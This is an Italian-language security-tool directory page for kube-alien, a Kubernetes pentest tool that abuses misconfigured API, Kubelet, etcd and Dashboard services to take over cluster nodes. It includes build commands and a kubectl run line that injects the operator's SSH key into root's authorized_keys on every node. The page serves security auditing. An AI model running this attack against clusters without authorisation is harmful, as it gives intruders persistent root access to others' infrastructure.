Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
kube-alien — Strumento automatizzato di penetration testing per cluster Kubernetes che sfrutta configurazioni errate in API, Kubelet, etcd e Dashboard per ottenere il takeover dei nodi tramite iniezione di chiavi SSH da un pod. | Kitploit
Strumenti/GitHubGitHub/nixwizard/kube-alien
Sicurezza dei ContenitoriExploitPenetration TestingSicurezza CloudConfigurazione Errata
GitHubnixwizard/kube-alien

kube-alien

Strumento automatizzato di penetration testing per cluster Kubernetes che sfrutta configurazioni errate in API, Kubelet, etcd e Dashboard per ottenere il takeover dei nodi tramite iniezione di chiavi SSH da un pod.

Vedi Repository
25225 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Kube-alien

Questo strumento lancia un attacco su un cluster k8s dall'interno. Ciò significa che è già necessario avere un accesso con il permesso di distribuire pod in un cluster per eseguirlo. Dopo aver eseguito il pod kube-alien, tenta di prendere il controllo dei nodi del cluster aggiungendo la tua chiave pubblica al file /root/.ssh/authorized_keys del nodo utilizzando questa immagine https://github.com/nixwizard/dockercloud-authorizedkeys (può essere regolata usando il parametro ADD_AUTHKEYS_IMAGE in config.py) fork da docker/dockercloud-authorizedkeys. L'attacco ha successo se c'è una configurazione errata in uno dei componenti del cluster, sfruttando i seguenti vettori:

  • Kubernetes API
  • Servizio Kubelet
  • Servizio Etcd
  • Kubernetes-Dashboard

Qual è lo scopo di questo strumento?

  • Durante un audit di sicurezza di un cluster k8s è possibile valutare rapidamente la sua postura di sicurezza.
  • Dimostrazione pratica dello sfruttamento dei vettori di attacco menzionati.

Come può un cluster k8s essere attaccato dall'interno in un contesto reale?

  • Vulnerabilità RCE o SSRF in un'applicazione in esecuzione in uno dei pod del cluster.

Utilizzo

L'immagine Kube-alien deve essere inviata al tuo dockerhub (o altro registro) prima di usare questo strumento.

root@kitploit:~
git clone https://github.com/nixwizard/kube-alien.git
cd kube-alien
docker build -t ka ./
docker tag ka YOUR_DOCKERHUB_ACCOUNT/kube-alien
docker push YOUR_DOCKERHUB_ACCOUNT/kube-alien

La variabile d'ambiente AUTHORIZED_KEYS deve essere impostata al valore della tua chiave pubblica SSH; in caso di successo, la chiave pubblica verrà aggiunta al file authorized_keys di root su tutti i nodi.

root@kitploit:~
kubectl run --image=YOUR_DOCKERHUB_ACCOUNT/kube-alien kube-alien --env="AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)" --restart Never

oppure puoi usare la mia immagine per test rapidi:

root@kitploit:~
kubectl run --image=nixwizard/kube-alien kube-alien --env="AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)" --restart Never

Controlla i log del pod Kube-alien per vedere se l'attacco ha avuto successo:

root@kitploit:~
kubectl logs $(kubectl get pods| grep alien|cut -f1 -d' ')

Le seguenti risorse mi hanno molto aiutato nella creazione di questo strumento

  • https://www.youtube.com/watch?v=vTgQLzeBfRU
  • https://www.youtube.com/watch?v=dxKpCO2dAy8 (e altri fantastici articoli sulla superficie di attacco di kubernetes su https://raesene.github.io)
  • https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c
Scarica lo strumento